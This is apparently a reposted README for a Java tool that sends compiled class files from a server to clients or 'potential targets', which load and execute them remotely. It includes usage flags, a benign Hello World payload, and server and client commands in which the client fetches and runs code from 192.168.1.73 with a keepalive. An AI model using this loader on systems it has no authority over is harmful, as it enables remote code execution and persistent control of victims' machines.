# []()

This tool allows you to send Java [bytecode]( “bytecode” ) in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The [client]( “client” ) receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.

# Features

* Client-server architecture
* Remote loading of Java class files
* In-transit [encryption]( “encryption” ) using ChaCha20 cipher
* Settings defined via args
* Keepalive mechanism to re-establish communication if server restarts

# Installation

Tool has been tested using OpenJDK 11 with JRE Java Package, both on [Windows]( “Windows” ) and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

# Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address address to connect (client) / to bind (server)
-classfile filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod name of method to invoke (default: exec)
-classname name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key secret key – 256 bits in base64 format (if not
specified it will generate a new one)
-port port to connect (client) / to bind (server)
-server run as server

# Example

Assuming you have the following Hello World payload in the `Payload.java` file:

//Payload.java
public class Payload {
public static String exec() {
String output = “”;
try {
output = “Hello world from client!”;
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}

Then you should compile and produce the respective `Payload.class` file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the `-client` flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are `Payload` and `String exec()` respectively). Additionally, you can specify `-keepalive` to keep the client requesting class file from server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

# References

Refer to for a blog post related with the development of this tool.

1.

2.

3.

4.

5.

6.

7.

8.

9.

10.

11.

12.

**[Download Java-Remote-Class-Loader]( “Download Java-Remote-Class-Loader” )**Read More